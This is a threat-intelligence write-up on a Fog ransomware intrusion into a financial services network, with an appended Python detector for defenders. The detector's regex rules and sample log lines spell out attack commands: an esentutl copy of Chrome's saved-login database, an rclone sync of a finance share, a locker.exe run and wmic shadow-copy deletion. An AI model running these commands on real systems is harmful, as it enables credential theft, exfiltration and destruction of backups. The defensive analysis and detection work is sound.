The Fog ransomware group, previously known for targeting the education and recreation sectors, has expanded its scope to financial services organizations. In the attack described here, the attackers used compromised VPN credentials to deploy the ransomware against both Windows and Linux endpoints.
Adlumin's security team detected the ransomware activity and isolated the affected machines, preventing data encryption and theft.
Although the attack originated from IP addresses in Russia, that alone cannot definitively attribute it to a specific geographic location, since source addresses may be masked.
The Fog ransomware, a variant of STOP/DJVU, exploits compromised VPN credentials to infiltrate networks, primarily targeting education and recreation sectors.
After gaining administrative access, it disables security measures, encrypts VMDKs, and deletes backups, leaving victims with limited options.
The ransomware, marked with extensions like ‘.FOG’ or ‘.FLOCKED’, demands a ransom via a Tor network platform.
Unlike traditional APT groups, Fog’s origin remains unattributed, suggesting a new, highly skilled threat actor.
The attackers began their network exploration by sending ping requests to various network devices and saving the results in text files named ‘pings.txt’ and ‘pingw.txt’.
Using elevated privileges obtained from compromised service accounts, they then employed the ‘Advanced_Port_Scanner_2.5.3869(1).exe’ tool to scan network hosts for open ports and enumerate the services behind them, which allowed them to identify potential vulnerabilities and entry points into the network.
The Adlumin team discovered that the attack began when an unprotected system was compromised from a Russian IP address; the attackers then abused compromised service accounts and domain trust relationships to traverse the network.
They executed the ‘nltest /domain_trusts’ command to gather information about domain trust relationships. Subsequently, they employed the ‘SharpShares.exe’ binary to map network drives and share folders on other devices, facilitating further lateral movement within the network.
The attacker used the ‘esentutl.exe’ command-line tool to create a backup of the login data stored in the Google Chrome user profile folder, which included encrypted credentials for various websites.
The backup was saved to a temporary file in the same directory, allowing the attacker to potentially extract the credentials later using decryption techniques.
The attacker leveraged Rclone, a file transfer tool, to selectively sync recently modified data (excluding specific file types) from compromised systems.
Next, they executed “locker.exe” with the “-id” switch, which likely carried a unique identifier for the attack, and the “-target” switch, which specified a network share for data exfiltration.
Finally, the attackers used WMIC and PowerShell commands to delete shadow copies, hindering file recovery from backups. This demonstrates a multi-pronged approach that combines data theft with encryption to pressure victims into paying the ransom.
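As an added, defender-side illustration (not code from the original article or from Adlumin): a small Python detector that runs the command-line indicators named in this account over process-creation records and reports which intrusion stages appear on each host. The log format, host names, user names and every sample command line are constructed assumptions.

```python
import re
# Command-line patterns for the intrusion stages described above; the stage is the prefix of each rule name.
RULES = {
    "recon_ping_batch": r"\bping\b.*>\s*ping[sw]\.txt",
    "recon_port_scan": r"advanced_port_scanner",
    "discovery_domain_trusts": r"\bnltest(\.exe)?\b.*/domain_trusts",
    "discovery_shares": r"\bsharpshares(\.exe)?\b",
    "credential_chrome_backup": r"\besentutl(\.exe)?\b.*login data",
    "exfil_rclone": r"\brclone(\.exe)?\b.*\b(sync|copy)\b",
    "impact_locker": r"\blocker\.exe\b.*-id\b.*-target\b",
    "impact_shadow_copy": r"wmic(\.exe)?\s+shadowcopy\s+delete|win32_shadowcopy.*remove-wmiobject",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

def parse_event(line):
    """Parse one 'timestamp|host|user|command line' record (a constructed log format)."""
    parts = line.strip().split("|", 3)
    return dict(zip(("ts", "host", "user", "cmdline"), parts)) if len(parts) == 4 else None

def scan_events(lines):
    """Return (host, rule, cmdline) for every record whose command line matches a rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for name, rx in COMPILED.items():
            if rx.search(ev["cmdline"]):
                hits.append((ev["host"], name, ev["cmdline"]))
    return hits

def stages_per_host(hits):
    """Map host -> stages observed; several stages on one host is the escalation signal."""
    stages = {}
    for host, rule, _ in hits:
        stages.setdefault(host, set()).add(rule.split("_", 1)[0])
    return stages

# Constructed sample records, not telemetry from the incident.
SAMPLE_EVENTS = [
    "2024-09-01T10:00:01|FS01|svc_backup|cmd.exe /c ping 10.0.0.5 > pings.txt",
    "2024-09-01T10:02:10|FS01|svc_backup|Advanced_Port_Scanner_2.5.3869(1).exe",
    "2024-09-01T10:05:44|FS01|svc_backup|nltest /domain_trusts",
    r'2024-09-01T10:20:33|WS07|jdoe|esentutl.exe /y "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"',
    r"2024-09-01T11:00:00|FS01|svc_backup|rclone.exe sync C:\Shares\Finance remote:drop --max-age 30d",
    r"2024-09-01T11:30:00|FS01|svc_backup|locker.exe -id CONSTRUCTED_ID -target \\FS01\share",
    "2024-09-01T11:31:00|FS01|svc_backup|wmic shadowcopy delete",
    r"2024-09-01T12:00:00|WS02|asmith|notepad.exe C:\notes.txt",
]
```

Feeding real process-creation telemetry through `scan_events` and then `stages_per_host` flags the host where reconnaissance, discovery, exfiltration and impact all appear within the same timeframe, which is the pattern this intrusion followed.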
The security team identified and isolated endpoints compromised by a Fog ransomware attack and found malicious binaries and vulnerable endpoints that allowed unauthorized access.
To mitigate the risk, the recommendations are to implement MFA, update VPN software, monitor VPN access, automate endpoint isolation, use a comprehensive security platform, disable unnecessary services, back up data regularly, apply the principle of least privilege, conduct security audits, establish incident response plans, and monitor network traffic.